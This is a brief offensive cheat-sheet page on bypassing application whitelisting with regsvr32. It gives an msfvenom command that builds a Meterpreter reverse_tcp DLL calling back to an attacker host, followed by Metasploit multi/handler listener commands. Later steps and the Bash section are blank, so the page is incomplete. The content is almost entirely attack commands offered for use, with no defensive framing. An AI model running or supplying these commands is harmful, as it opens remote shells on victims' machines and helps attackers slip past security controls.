githubEdit

Application Whitelisting Bypass

Application Whitelisting Bypass

Tools: regsvr32, Bash

REGSVR32

1)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACK_IP LPORT=PORT -f dll -a x86 > example.dll

2)

msfconsole -q

3)

use exploit/multi/handler

4)

set payload windows/meterpreter/reverse_tcp

5)

set LHOST IP

6)

set LPORT PORT

7)

8)

9) Victim:

OR

BASH

Last updated